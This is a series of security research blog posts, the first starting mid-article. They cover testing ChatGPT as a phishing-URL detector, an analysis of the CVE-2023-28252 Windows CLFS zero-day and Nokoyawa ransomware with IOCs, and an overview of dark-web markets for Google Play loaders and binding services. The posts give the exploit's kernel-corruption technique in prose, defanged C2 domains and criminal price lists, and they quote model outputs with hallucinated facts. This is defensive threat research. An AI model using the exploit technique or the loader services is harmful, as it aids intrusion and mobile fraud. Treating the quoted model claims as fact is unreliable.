  • Obviously malicious links are easy to detect, but the task is still non-trivial, because it requires world knowledge (for example, knowing the names of popular web services).
  • URLs are still text, and LLMs are good at processing text.

So here is what we did.

Let’s talk?

First of all, we opened the ChatGPT web interface and checked if what we wanted was even possible:

Judging by the URL, is this link a phishing attempt? Please explain why. Link: hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Yes, it is likely a phishing attempt.

The URL appears to be intentionally deceptive, as it contains several red flags:

  • The domain name “caseld-10xxxx.info” is not associated with any reputable or recognizable entity, and it looks like a random sequence of letters and numbers.
  • The URL uses the term “Office365” which is a popular productivity suite, and it is a common target for phishing attacks. Cybercriminals often use this tactic to lure unsuspecting victims into clicking on a link and disclosing sensitive information.
  • The word “live” in the URL could be used to imply that the page is an official Microsoft Office365 login page, as Microsoft has used “live” in the past in some of its services.
  • The misspelling of “Office” as “0fflce” is another red flag as it is a common tactic used by phishers to trick users into believing the website is legitimate.
  • The “.php” extension at the end of the URL suggests that it is a PHP script running on a server, which is commonly used in phishing attacks to harvest login credentials.

Therefore, it is advisable to avoid clicking on such links and to always check the URL’s legitimacy before entering any personal information or credentials.

This is a pretty reasonable explanation. Aside from the fact that the model shows some distrust of PHP (well, who doesn’t?), it is good at recognizing the target organization, a homographic attack (0ffice), and even points out why “live” might have been used. This is an explanation worthy of a junior analyst.

To gather a corpus of explanations, we used the OpenAI API to query the model GPT-3.5-turbo, which is the backend for ChatGPT. It is fast and cheap (we checked a lot of links), but still powerful enough. For the test corpus, we gathered a few thousand links that our detection technologies deemed phishing, and threw in a few thousand safe URLs.

Attempt 1. Is it phishing?

ChatGPT is great at providing the answer in the form that you require – from poems:

And lastly, “0fflce” it doth spell amiss,

A trick oft used by phishers with a hiss.

Beware, dear user, and take great care,

Lest thou fall victim to this cyber snare.

to machine-readable formats. It can also do more than one thing at once. This means that in addition to the yes/no answer to the question about link safety, we could ask ChatGPT to format the response as JSON and also to include a rationale, as well as the possible target. So, after a few iterations, we settled on the following prompt:

{"role": "system", "content": "You are CyberGPT, a guru cyber security assistant AI."},
        {
            "role": "user", 
            "content": 'Does this link lead to a phish website? Answer in the json format {"phish": "yes|no", "reasoning": "detailed explanation why", "target_company": "possible targeted company"}\nLink: ' + url
        }

We use a system prompt here (according to practitioners and docs, this is less important than the user input) that portrays ChatGPT as a cybersecurity chatbot and ask for its verdict in the user prompt. Frankly, the fact that it is so easy to get the desired output from ChatGPT is awe-inspiring.
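
For reference, a call wrapping this prompt looked roughly like the following (a sketch assuming the openai Python package as it existed at the time of the experiment and an API key in the environment; the helper function is ours, not from the study):

import json
import openai

def classify_url(url: str) -> dict:
    response = openai.ChatCompletion.create(
        model="gpt-3.5-turbo",
        messages=[
            {"role": "system", "content": "You are CyberGPT, a guru cyber security assistant AI."},
            {"role": "user", "content":
                'Does this link lead to a phish website? Answer in the json format '
                '{"phish": "yes|no", "reasoning": "detailed explanation why", '
                '"target_company": "possible targeted company"}\nLink: ' + url},
        ],
    )
    # The model is asked to return JSON; broken outputs still need handling (see below).
    return json.loads(response["choices"][0]["message"]["content"])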

It took us two nights to get about 6,000 verdicts (probably because we ran the experiment at the peak of all the hype), and once we got the data, we proceeded to parse the results.

Unfortunately, while most of the outputs could be parsed as is, some were corrupted: some contained additional text, such as “Note: be careful when opening links…” or just a dot at the end, others had unnecessary escape characters. All in all, less than 0.5% of JSONs were broken beyond automated fixes or contained text such as:

I am sorry, but as an AI language model, I am not able to access the internet or browse the website provided. However, as per the standard industry practices, you can check the legitimacy of the website by running it through a reputable online phishing detection service/provider. Additionally, if there are any official reports of phishing attacks or scams associated with the target company, it further increases the likelihood of the link leading to a phish website.

Which is still a reasonable answer.

All in all, after all the errors and rejections, we were left with a dataset of 2322 phish and 2943 safe URLs. The resulting metrics are:

  • Detection rate: 87.2%
  • False positive rate: 23.2%

While the detection rate is very high, the false positive rate is unacceptable. Imagine if every fifth website you visit was blocked? Sure, no machine learning technology on its own can have a zero false positive rate, but this number is too high. To put this in perspective, in a well-known paper called URLnet, where Le et al. solved a very similar task, the authors managed to achieve about the same level of detection rate (~85%) with a false positive rate of about 0.4% with a specially crafted convolutional neural network. A more recent URLTran paper by Maneriker et al. uses Transformers (the same architecture that powers ChatGPT) to achieve an even lower FPR.

ROC curve from Le et al., 2018, illustrating achievable TPR (DR)/FPR values

Unfortunately, there are no miracles here. This is also where we met the first limitation – we can’t adjust the threshold to trade FPR for DR. Or can we?

The second experiment: ‘Is it safe?’

Our prompt was probably too specific and cued the language model to view the link with suspicion. Instead of asking if the link is phishing, we could ask if it is safe to visit, and maybe the LLM would behave less suspiciously. This led us to the second prompt:

{"role": "system", "content": "You are a helpful internet security assistant chatbot."},
        {
            "role": "user", 
            "content": 'Is this link safe to visit? '
            'Answer in the json format: {"safe": "yes|no", "yes_confidence": 0.5}'
            '\nwhere "yes_confidence" is the confidence that the link is safe from 0 to 1. '
            'Only output json.'
            '\nLink: ' + url
        },

Differences from the previous prompt:

  • Gone is the ‘cybersecurity guru’, who by nature should be suspicious of random links
  • We don’t ask for the target, so as not to alert the model that this is a phishing detection task
  • We do, however, ask for confidence. Though this is very unlikely, confidence may prove useful.

The results were quite discouraging:

  • Detection rate: 93.8%
  • False positive rate: 64.3%

It turns out that the more general prompt is more likely to elicit a verdict that the link is dangerous. This is how the verdicts assigned to links from the safe subset of the data changed, compared to the previous cybersecurity guru prompt:

                                                    Internet security assistant chatbot verdicts (safe data)
CyberGPT cybersecurity guru verdicts (safe data)        safe      unsafe
safe                                                    1049        1210
phish                                                      2         682

Interestingly, the confidence choices are more like human-assigned confidence in the sense that round numbers like 90% occur most often:

TOP 5 probabilities that the model chose. Note that they are rounded to 0.1

At least the ROC curve looks alright, but there is no point at which this prompt would outperform the cybersecurity guru from the previous attempt:

ROC curve based on probabilities provided by ChatGPT

To conclude, it is hard to predict the behavior of the LLM based on human reasoning about the prompt. Probably the “safety” of a link is a vaguer concept than “phish”. Understanding why the first prompt won by a large margin is difficult, and choosing the best prompt at this time, despite the emergence of new prompt engineering techniques, is more art than science.

Verdict stability

An important fact about LLMs is that the generation process is random. While you can coerce an LLM to be almost deterministic by setting its temperature parameter, which actually controls the output randomness, to 0 (there are still numerical sources of non-determinism), it usually leads to poor performance (such as the tendency to repeat the same phrase over and over again). As a result, for each token (a word or its part) that the network generates, it has a few alternatives among the choices (also controllable by parameters).

Non-deterministic verdicts are not the top feature you expect from a detection system. To measure its impact on the results, we conducted another small experiment in which we chose 200 random URLs (100 safe and 100 phish) and gathered verdicts with the same simplified prompt:

{"role": "system", "content": "You are a helpful internet security assistant chatbot."},
        {
            "role": "user", 
            "content": 'Is this link safe to visit? '
            'Answer in the json format: {"safe": "yes|no"}'
            '\nOnly output json.'
            '\nLink: ' + url
        },

This is how the results of these two identical runs compare (the responses are not post-processed and answer the question of whether the link is safe):

                 Run 2
Run 1        no    unknown    yes
no          145          2      3
yes           4          0     46

So, the verdict for 4.5% of the URLs changed due to the randomness of the LLM, with the variation in verdicts between runs on safe URLs being 7%. Again, while this can be remedied by tweaking the temperature, it is an important factor to keep in mind when using LLMs.

Organization extraction

The most striking aspect of ChatGPT’s performance was the extraction of the potential phishing target. When attackers craft their samples, they try to trick users into believing that the URL is genuine and belongs to a company, while also obfuscating it enough to fool automated analysis. Extracting the attack target can be useful in many scenarios.

ChatGPT has enough real-world knowledge to know about many internet and financial services and with only a small post-processing step (e.g., merging “Apple” and “iCloud” or removing “LLC” and “Inc”) it does a very good job at extracting them. It was able to identify a target more than half the time. Note that not every URL contains a reference to a target organization. Among the identified companies, there were major tech portals like Facebook, TikTok and Google, marketplaces such as Amazon and Steam, lots of banks from all over the world, from Australia to Russia, cryptocurrency and delivery services.

Some interesting examples include:

URL: hxxps://steancxxxmuunity.com/profiles/765xxxxxxxxxx175

Organization: Steam

Reasoning: The domain name ‘steancxxxmuunity.com’ appears to be a typo-squatting attempt. The correct spelling of the domain should be ‘steamcommunity.com’. The website is trying to impersonate Steam Community, a popular gaming platform…

URL: https://cxxxxxxxxr.com/wp-includes/js/jcrop/cgi/BOfA/Validation/login.php?cmd=login_submit

Organization: Bank of America

Reasoning: The link is suspicious and indicates a phishing attempt because the domain name is not related to the possible targeted company (Bank of America), the URL is also suspicious containing additional characters such as ‘/wp-includes/js/jcrop/cgi’…

URL: http://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Organization: Microsoft

Reasoning: The link’s domain name (caseld-10xx93.info) does not appear to be related to Microsoft’s Office 365 service. The URL path also contains a misspelled version of the word ‘office’ (0fflce) and a suspiciously old version number (3.6.5).

URL: http://adobexxxsignxxxx.duckdns.org/ees/

Organization: Adobe

Reasoning: The domain name ‘duckdns.org’ is a free dynamic DNS provider which is often used by cyber criminals for hosting phishing sites or other malicious content. Additionally, the subdomain adobexxxsignxxxx in the URL appears to imitate the legitimate Adobe service ‘Adobe Sign’, which suggests that the attackers may be targeting Adobe’s customers for information theft or fraud.

Here we see that ChatGPT detects homographic attacks (although it can confuse them with typo-squatting), and correctly states that the domains are not related to the companies. While it fails to untangle that “3.6.5” is an imitation of 365, the explanations are quite reasonable.

Implicit knowledge: reasoning analysis

The examples above are cherry-picked. When cherry-picking with the opposite intention, some funny things happen. The explanations that ChatGPT provides may include:

  • References to WHOIS, which the model doesn’t have access to:
    • Finally, if we perform a WHOIS lookup for the domain name, it was registered very recently (2020-10-14) and the registrant details are hidden.
  • References to content on a website that the model doesn’t have access to either:
    • the website is asking for user credentials on a non-Microsoft website. This is a common tactic for phishing attacks.
    • Additionally, the webpage’s layout and design are inconsistent with eBay’s official website, indicating that it may be a fake website designed to impersonate eBay.
    • There is also no information available on the website’s security and privacy policy. A secure website should provide that information transparently to users.
  • References to SSL certificate expiration:
    • The domain ‘duckdns.org’ is not owned by Netflix, and the SSL Certificate is invalid.
  • Misstatements:
    • The domain ‘sxxxxxxp.com’ is not associated with Netflix and the website uses ‘http’ protocol instead of ‘https’ (the website uses https)
  • Revelatory nuggets of cybersecurity information:
    • The domain name for the URL ‘yxxxx3.com’ appears to be registered in Korea which is a red-flag.

These are funny and highlight the limitations of an LLM: while it can generate reasonable explanations, it is also prone to hallucinations – such as imagining contexts that it does not have access to, or coming up with facts that are just plain wrong.

In general, however, we see that the model demonstrates a non-trivial understanding of the task. Analyzing all the explanations by hand would be laborious, so we do some distant reading here to get a bird’s-eye overview of the reasonings it generates by applying a little bit of old-school NLP.

First of all, we noticed that the model used mostly short, terse sentences with one point per sentence in its explanations. We split the statements into sentences using the NLTK Punkt tokenizer. The resulting sentences were then vectorized using MPNet from the Sentence-Bert package, and then visualized using UMAP. To color the resulting plot, we used DBSCAN clustering. A few iterations of hyperparameter tweaking yield the following result:

Cluster analysis of explanations provided by ChatGPT. Semantically close reasons form dense clusters.
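
The distant-reading pipeline behind this plot can be sketched roughly as follows (the sentence-transformer model name and the clustering parameters here are illustrative choices, not necessarily the exact ones used):

import nltk
import umap
from nltk.tokenize import sent_tokenize
from sentence_transformers import SentenceTransformer
from sklearn.cluster import DBSCAN

nltk.download("punkt")

explanations = ["...reasoning strings collected from the model..."]   # placeholder input
sentences = [s for text in explanations for s in sent_tokenize(text)]

embeddings = SentenceTransformer("all-mpnet-base-v2").encode(sentences)
coords = umap.UMAP(n_neighbors=15, min_dist=0.1).fit_transform(embeddings)
labels = DBSCAN(eps=0.5, min_samples=5).fit_predict(coords)   # cluster labels used to color the plot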

These dense clusters reveal the most popular phrases that the model provides as explanations. Some of these clusters are:

  • Mentions of particular target companies.
  • Recommendations not to click the link.
  • Certain statements about the website being phish or not.
  • Statements of uncertainty.
  • References to HTTPS (or lack thereof) or SSL (usually hallucinations)
  • Sentences like “This is a common tactic…”

However, some of them reveal “common tactics”:

  • Use of IPFS: “The URL looks suspicious and appears to be hosted on IPFS which can be used to host malicious content.”
  • Suspicious elements in path, including homographic attacks: “This link is an example of a homograph attack also known as ‘IDN homograph attack’.”
  • Elements in path or domain that are related to security and urgency: “Lastly, the URL has a sense of urgency to it, indicating that the user needs to click immediately.”
  • Use of dynamic DNS: “The domain name ‘duckdns.org’ is a free dynamic DNS provider that can be used by anyone to create custom subdomains, which makes it easy for attackers to use for phishing emails or websites impersonating legitimate companies”.
  • An email in the parameters: “Additionally, the email address used as a query parameter may indicate a potential phishing attempt.”
  • Mention of an organization in the path or subdomain while the domain is not related to the organization: “The link appears suspicious as it contains a subdomain that is not related to Amazon.”
  • Elements in the domain that look autogenerated: “Also, the path ‘bafyxxxxxxxxxxxxxxxxxx43ky’ suggests that this is an autogenerated link.”

These points make a lot of sense. This means that the training data for ChatGPT contained enough cybersecurity material for the LLM to learn the telltale signs of phishing attempts and use this knowledge to analyze specific cases, which is very impressive.

Conclusion

As we have seen, for a zero-shot system the results are amazing – it is hard to argue with, even for a die-hard sceptic. Anecdotal examples, especially the cherry-picked ones, are also very impressive. This is why, when we talk about real-world performance, a screenshot from Twitter is not a solid basis for decision-making. This is especially true in cybersecurity, where applying automated scenarios to our tasks means going far beyond “good” or even “impressive” performance.

As with many other use cases, the core detection task is only part of the problem. Creating signatures or blocklist records, validating and testing them, delivering them, ensuring quality of service is less glamorous, but just as important, and here we need a lot of hard work done by humans to get things rolling.

Moreover, the use of LLMs means applying a whole new set of skills. We could have improved the results in detection, target organization extraction and reasoning alike by trying various things:

  • Using a stronger model, such as GPT-4
  • Using special prompt-designing patterns, such as Chain-of-Thought-prompting or Reflect-Critique-Improve
  • Feeding parts of the HTML along with the URL
  • Adjusting the system prompt and sampling parameters, such as temperature, etc.

However, this means abandoning the hope of a zero-shot AI that “just works”. Also, using LLMs means dealing with their current idiosyncrasies, such as the demonstrated tendency to hallucinate (manifested by coming up with imaginary explanations and referring to page texts it has never seen), randomness of output, as well as possible prompt injection attacks.

On the other hand, if we look at the organization extraction and reasoning, we have to admit that it performs on par with what we would expect from an intern-level phishing analyst: it is good, but never leave it without supervision! Therefore, it is possible to use this type of technology to assist flesh-and-blood analysts by highlighting suspicious parts of the URL and suggesting possible attack targets. It could also be used in weak supervision pipelines to improve classic ML pipelines.

All in all, while impressive, ChatGPT and LLMs are not yet ready to radically change the cybersecurity game, at least as far as phishing detection is concerned. At Kaspersky, we continue to investigate cutting-edge technologies and study their potential impact on both cyberattackers and defenders. Let’s see what happens next.

Nokoyawa ransomware attacks with Windows zero-day https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/ https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/#comments Tue, 11 Apr 2023 17:36:20 +0000 https://kasperskycontenthub.com/securelist/?p=109483

Updated April 20, 2023

In February 2023, Kaspersky technologies detected a number of attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East and North America, and previously in Asia. These exploits were very similar to already known Common Log File System (CLFS) driver exploits that we analyzed previously, but we decided to double-check, and it was worth it – one of the exploits turned out to be a zero-day, supporting different versions and builds of Windows, including Windows 11. The exploit was highly obfuscated, with more than 80% of its code being “junk” elegantly compiled into the binary, but we quickly and fully reverse-engineered it and reported our findings to Microsoft. Microsoft assigned CVE-2023-28252 to the Common Log File System elevation-of-privilege vulnerability, and a patch was released on April 11, 2023, as part of the April Patch Tuesday.

While the majority of zero-days that we’ve discovered in the past were used by APTs, this particular zero-day was used by a sophisticated cybercrime group that carries out ransomware attacks. This group is notable for its use of a large number of similar but unique Common Log File System (CLFS) driver exploits that were likely developed by the same exploit author. Since at least June 2022, we’ve identified five different exploits used in attacks on retail & wholesale, energy, manufacturing, healthcare, software development and other industries. Using the CVE-2023-28252 zero-day, this group attempted to deploy the Nokoyawa ransomware as a final payload.

Nokoyawa ransom note

Elevation-of-privilege exploit

The attacker must be authenticated with user access and have the ability to run code on the target system to launch the elevation-of-privilege exploit.

CLFS is a log file subsystem that was first introduced in Microsoft Windows Server 2003 R2 / Windows Vista and is implemented in the clfs.sys driver. This file system can be used by any application, and Microsoft provides an API for it. Logs are created using the CreateLogFile function – a log is made up of a base log file (.blf file name extension) that is a master file containing metadata, and a number of containers that hold the actual data. Containers are created using the AddLogContainer and AddLogContainerSet functions. As you may already guess, the base log files are the most interesting to look at. But while Microsoft provides an API for working with them, their file format is undocumented, and developers should interact with them only through the CLFS API. The file structure of base log files, when viewed briefly in a hex editor, does not seem very complicated, and Microsoft provides debug symbols for clfs.sys, so with a sufficient level of enthusiasm this format can be reverse engineered (already done by Alex Ionescu).

A glance at the structure of base log files instantly raises a red flag – the file consists of kernel structures stored as is, and there are even fields for storing memory pointers! Combine that with the fact that, according to the API documentation, this technology is quite complicated, plus the fact that it was developed a long time ago, and we get a large number of vulnerabilities as a result. Searching for “Windows Common Log File System Driver Elevation Of Privilege Vulnerability” shows that there have been at least thirty-two such vulnerabilities (not counting CVE-2023-28252) discovered since 2018, three of which were detected in the wild as zero-days (CVE-2022-24521, CVE-2022-37969, CVE-2023-23376).
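
To make the above more tangible, here is a minimal sketch (not taken from the exploit or from the original research) that uses the documented user-mode CLFS API to create a test base log file and one container, so the resulting .blf file can be examined in a hex editor. The paths, container size and flag values are illustrative examples, and error handling is omitted:

# Create a CLFS base log file (.blf) and a container via clfsw32.dll for inspection.
# Assumes C:\Temp exists; check the return values in real use.
Add-Type -Namespace Win32 -Name Clfs -MemberDefinition @'
[DllImport("clfsw32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr CreateLogFile(
    string pszLogFileName, uint fDesiredAccess, uint dwShareMode,
    IntPtr psaLogFile, uint fCreateDisposition, uint fFlagsAndAttributes);

[DllImport("clfsw32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool AddLogContainer(
    IntPtr hLog, ref ulong pcbContainer, string pwszContainerPath, IntPtr pReserved);
'@

$GENERIC_READ_WRITE    = [uint32]3221225472   # GENERIC_READ | GENERIC_WRITE (0xC0000000)
$OPEN_ALWAYS           = 4                    # create the log if it does not exist yet
$FILE_ATTRIBUTE_NORMAL = 0x80

# The "log:" prefix marks a CLFS log name; the .blf extension is appended automatically
$hLog = [Win32.Clfs]::CreateLogFile('log:C:\Temp\MyTestLog', $GENERIC_READ_WRITE, 0,
                                    [IntPtr]::Zero, $OPEN_ALWAYS, $FILE_ATTRIBUTE_NORMAL)

# Add one container that will hold the actual log records (512 KB is the minimum size)
$containerSize = [uint64]512KB
[Win32.Clfs]::AddLogContainer($hLog, [ref]$containerSize, 'C:\Temp\MyTestLog.Container0', [IntPtr]::Zero)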

CVE-2023-28252 is an out-of-bounds write (increment) vulnerability that can be exploited when the system attempts to extend a metadata block. The vulnerability is triggered by manipulating a base log file. At this time, we will not share the names of the fields or exact values that should be written to the file in order to trigger the vulnerability, as that information could facilitate further exploitation. This is to ensure that everyone has enough time to patch their systems before other actors develop their own exploits for CVE-2023-28252. Instead, we will share some general information about the vulnerability and the way of exploiting it.

The vulnerability is triggered in the CClfsBaseFilePersisted::ExtendMetadataBlock function when this function is executed with a call to the AddLogContainer API function. For CClfsBaseFilePersisted::ExtendMetadataBlock to be executed, a certain condition needs to be met, and the base log file has to be modified for that to happen. Besides, various fields in the CONTROL and CONTROL_SHADOW metadata blocks need to be patched. The exploit modifies LogBlockHeader->ValidSectorCount and various fields in LogBlockHeader->Record[0] for both the CONTROL and CONTROL_SHADOW metadata blocks. As a result of these changes, the CClfsBaseFilePersisted::ExtendMetadataBlock function performs an out-of-bounds access to the m_rgBlocks array, which contains only six elements. After that, the CClfsBaseFilePersisted::WriteMetadataBlock function proceeds to use the value retrieved from the m_rgBlocks array as a pointer to a _CLFS_LOG_BLOCK_HEADER structure and increments LogBlockHeader->Record[0]->DumpCount and LogBlockHeader->Usn. This can be used to corrupt a kernel object in memory and obtain kernel read/write privileges if the address of the desired victim object is sprayed at the right location in memory.

The discovered exploit uses the vulnerability to corrupt another specially crafted base log file object in such a way that a fake element of the base log file gets treated as a real one. _CLFS_CONTAINER_CONTEXT is an example of a structure that gets stored in base log files but contains a field for storing a kernel pointer. Of course, the value of this field is ignored when the structure is read from the base log file on disk, but changing, in memory, the offset that points to the valid _CLFS_CONTAINER_CONTEXT structure into an offset pointing to a specially crafted malicious _CLFS_CONTAINER_CONTEXT structure makes it possible to provide a pointer to attacker-controlled user-mode memory and obtain kernel read/write privileges with it.

The exploit leaks the addresses of kernel objects to achieve stable exploitation. This is done using the NtQuerySystemInformation function – a technique that we previously saw in other zero-days (e.g. PuzzleMaker, MysterySnail APT cases). The information classes used by the exploit require Medium IL to work.

We believe that CVE-2023-28252 could have been easily discovered with the help of fuzzing. But so many vulnerabilities have already been found in this component that, if it is discoverable by fuzzing, why had it not been found before? We have a possible explanation. Examining the clfs.sys driver code in a disassembler shows extensive use of try/catch blocks to catch exceptions. In many parts of the code, when an exception occurs, it gets masked by an exception handler and the code continues its normal execution as if nothing happened. We verified that with CVE-2023-28252 a possible access violation that follows after triggering the vulnerability is masked by an exception handler. This makes us think that fuzzers were actually hitting this vulnerability before, but because there was no crash, it remained undiscovered. For effective fuzzing, it’s necessary to keep in mind the possibility of such a scenario and to take steps to prevent it.

Post exploitation and malware

We see that the main purpose of using elevation-of-privilege exploits was to dump the contents of the HKEY_LOCAL_MACHINE\SAM registry hive.

As for the malware, attackers use Cobalt Strike BEACON as their main tool. It’s launched with a variety of custom loaders designed to evade AV detection.

In some of the other attacks that we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victim’s machines were infected with a custom modular backdoor named “Pipemagic” that gets launched via an MSBuild script. At the end of last year, we published a private report about this malware for customers of the Kaspersky Intelligence Reporting service.

In attacks using the CVE-2023-28252 zero-day, this group attempted to deploy Nokoyawa ransomware as a final payload. Earlier variants of Nokoyawa were just “rebranded” variants of JSWorm ransomware, which we wrote about previously. In this attack, cybercriminals used a newer version of Nokoyawa that is quite distinct from the JSWorm codebase. It’s written in C and has encrypted strings. It was launched with an encrypted JSON config provided via a “--config” command line argument.

Decrypted and formatted config of Nokoyawa ransomware

Conclusions

We see a significantly increasing level of sophistication among cybercriminal groups. We don’t often see APTs using zero-day exploits in their attacks, and now there are financially motivated cybercriminal groups that have the resources to acquire exploits for unknown vulnerabilities and routinely use them in attacks. Moreover, there are developers willing to help cybercriminal groups and to produce one exploit after another.

We detect the CVE-2023-28252 exploit and related malware with the verdicts:

  • PDM:Exploit.Win32.Generic
  • PDM:Trojan.Win32.Generic
  • HEUR:Trojan-Ransom.Win32.Generic
  • Win64.Agent*

Kaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. CVE-2023-28252 is the latest addition to the long list of zero-days discovered in the wild with the help of our technologies. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.

More information about this and related attacks is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports@kaspersky.com.

Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches.

Indicators of compromise

After finishing, the exploit leaves the files used for exploitation at a hard-coded path in the “C:\Users\Public\” folder. Companies can check whether the exploit was launched on their servers or employees’ machines by looking for the presence of the “C:\Users\Public\.container*”, “C:\Users\Public\MyLog*.blf”, and “C:\Users\Public\p_*” files.
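
A quick way to sweep a machine for these artifacts is a simple file-presence check along the following lines (a minimal sketch; a match warrants further investigation rather than being definitive proof of compromise):

# Look for CVE-2023-28252 exploitation artifacts left in C:\Users\Public\
$patterns = 'C:\Users\Public\.container*',
            'C:\Users\Public\MyLog*.blf',
            'C:\Users\Public\p_*'

$hits = foreach ($p in $patterns) {
    Get-ChildItem -Path $p -Force -ErrorAction SilentlyContinue
}

if ($hits) {
    $hits | Select-Object FullName, CreationTime, Length
} else {
    'No known exploitation artifacts found.'
}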

Exploitation artifacts
C:\Users\Public\.container*
C:\Users\Public\MyLog*.blf
C:\Users\Public\p_*

Exploit
46168ed7dbe33ffc4179974f8bf401aa

CobaltStrike loaders
1e4dd35b16ddc59c1ecf240c22b8a4c4
f23be19024fcc7c8f885dfa16634e6e7
a2313d7fdb2f8f5e5c1962e22b504a17

CobaltStrike C2s
vnssinc[.]com
qooqle[.]top
vsexec[.]com
devsetgroup[.]com

Nokoyawa ransomware
8800e6f1501f69a0a04ce709e9fa251c

Overview of Google Play threats sold on the dark web https://securelist.com/google-play-threats-on-the-dark-web/109452/ https://securelist.com/google-play-threats-on-the-dark-web/109452/#comments Mon, 10 Apr 2023 08:00:02 +0000 https://kasperskycontenthub.com/securelist/?p=109452

In 2022, Kaspersky security solutions detected 1,661,743 malware or unwanted software installers targeting mobile users. Although the most common way of distributing such installers is through third-party websites and dubious app stores, their authors every now and then manage to upload them to official stores, such as Google Play. These are usually policed vigorously, and apps are pre-moderated before being published; however, the authors of malicious and unwanted software employ a variety of tricks to bypass platform checks. For instance, they may upload a benign application, then update it with malicious or dubious code, infecting both new users and those who have already installed the app. Malicious apps get removed from Google Play as soon as they are found, but sometimes only after having been downloaded a number of times.

With many examples of malicious and unwanted apps on Google Play being discovered after complaints from users, we decided to take a look at what the supply and demand of such malware on the dark web looks like. It is especially important to analyze how this threat originates, because many cybercriminals work in teams, buying and selling Google Play accounts, malware, advertising services, and more. It’s a whole underground world with its own rules, market prices, and reputational institutions, an overview of which we present in this report.

Methodology

Using Kaspersky Digital Footprint Intelligence, we were able to collect examples of offers of Google Play threats for sale. Kaspersky Digital Footprint Intelligence allows discreet monitoring of pastebin sites and restricted underground online forums to discover compromised accounts and information leakages. The offers presented in this report were published between 2019 and 2023 and were collected from the nine most popular forums for the purchase and sale of goods and services related to malware and unwanted software.

Key findings

  • The price of a loader able to deliver a malicious or unwanted app to Google Play ranges between $2,000 and $20,000.
  • To keep their activities low-profile, a large percentage of attackers negotiate strictly through personal messages on forums and messengers, for example, in Telegram.
  • The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners and even dating apps.
  • Cybercriminals accept three main kinds of payment: a percentage of the final profit, subscription or rent, and one-time payment.
  • Cybercriminals offer to launch Google ads to attract more people to download malicious and unwanted apps. The cost of ads depends on the target country. Ads for users from the USA and Australia cost the most — up to about $1 (US).

Types of malicious services offered on the dark web

As on legitimate online marketplaces, there are also various offers on the dark web for customers with different needs and budgets. In the screenshot below, you can see an offer list that gives an overview of the different goods and services that may be needed to target Google Play users. The author of the list calls the prices too high; however, they do not contradict the prices we’ve seen in other dark web offers. The main products that attackers buy are developers’ Google Play accounts, either hacked or registered by cybercriminals using stolen identities, as well as the source code of various tools that help the buyer upload their creations to Google Play. Also on offer are services such as a VPS, or Virtual Private Server (for $300), which the attackers use to control infected phones or to redirect user traffic, as well as web-based injections. A web injection is malicious functionality that monitors the victim’s activity, and if they open a web page that is of interest to the cybercriminals, an injector replaces it with a malicious one. Such a feature is offered for $25–80 apiece.

A dark web service provider calls these prices too high, and indicates that they sell the same services cheaper

See translation

Here are the real product prices and how much money you need if you don’t choose me

  1. GP developer account ~ $60
  2. App source or expenses on merging a loader and an existing APK $4000 rent $20000 purchase
  3. VPS for the panel ~ $300
  4. VPS-proxy to redirect traffic ~ $100–300
  5. Domains ~ $5 per domain
  6. Loader development or rent ~ $2500–5000
  7. Bot development or rent ~ $1000–20,000
  8. Purchase or development of necessary web injections ~ $25–80 per injection. The more injections you have, the more you get from the installations
  9. Regular bot/loader cleanup (FUD) ~$300, encryption in online services ~$200
  10. Installations:
    • Traffic purchase for the GP loader
    • Installations purchase ~$1/installation; you can start with 300 installations to warm up the loader and assess their persistence => $300
    • Direct messaging
    • Email spam (forget about APK being undetectable)

Let’s take a look at some specific programs and services that cybercriminals offer for sale.

Google Play loaders

In most of the offers we analyzed, attackers sell Google Play loaders, programs whose purpose is to inject malicious or unwanted code into a Google Play app. This app is then updated on Google Play, and the victim may download the malicious update onto their phone. Depending on what exactly was injected into the app, the user may obtain the final payload with the update or get a notification prompting them to enable installation of unknown apps and install it from an external source. In the latter case, until the user agrees to install the additional app, the notification does not disappear. After installing the app, the user is asked for permissions to access key data from the phone, such as Accessibility Services, camera, microphone, etc. The victim may not be able to use the original legitimate app until they give the permissions required to perform malicious activities. Once all the requested permissions are granted, the user is finally able to use the app’s legitimate features, but at the same moment their devices become infected.

To convince the buyer to purchase their loaders, cybercriminals sometimes offer to provide a video demonstration, as well as to send a demo version to the potential client. Among the loader features, their authors may highlight the user-friendly UI design, convenient control panel, victim country filter, support for the latest Android versions, and more. Cybercriminals may also supplement the trojanized app with functionality for detecting a debugger or sandbox environment. If a suspicious environment is detected, the loader may stop its operations, or notify the cybercriminal that it has likely been discovered by security investigators.

Google Play loaders are the most popular offer on the dark web among Google Play threats

Often, loader authors specify the types of legitimate apps their loaders work with. Malware and unwanted software are frequently injected into cryptocurrency trackers, financial apps, QR-code scanners and even dating apps. Cybercriminals also highlight how many downloads the legitimate version of the target app has, that is, how many potential victims can be infected by updating the app with malicious or unwanted code. Most frequently, sellers promise to inject code into an app with 5,000 downloads or more.

Cybercriminals sell a Google Play loader injecting code into a cryptocurrency tracker

Binding service

Another frequent offer on the dark web is binding services. In essence, these do exactly the same thing that Google Play loaders do — hide a malicious or unwanted APK file in a legitimate application. However, unlike a loader, which adapts the injected code to pass the security checks on Google Play, a binding service inserts malicious code into an app that is not necessarily suitable for the official Android marketplace. Often, malicious and unwanted apps created with a binding service are distributed through phishing texts, dubious websites with cracked games and software, and more.

As binding services have a lower successful installation rate than loaders, the two differ greatly in price: a loader can cost about $5,000, while a binding service usually costs about $50–$100 per file.

Seller’s description of a binding service

See translation

We present for your consideration an APK binding service.

What is APK binding for? In a nutshell, binding allows attackers to install a bot to gain more trust from the victim, who is loyal to the legitimate app that the Android bot is bound to.

In creating this binding service, our main goal was to create a universal binder that would allow binding an Android bot to any legitimate application.

The main condition for enabling binding is the possibility to decompile a legitimate app and then compile it back using apktool.

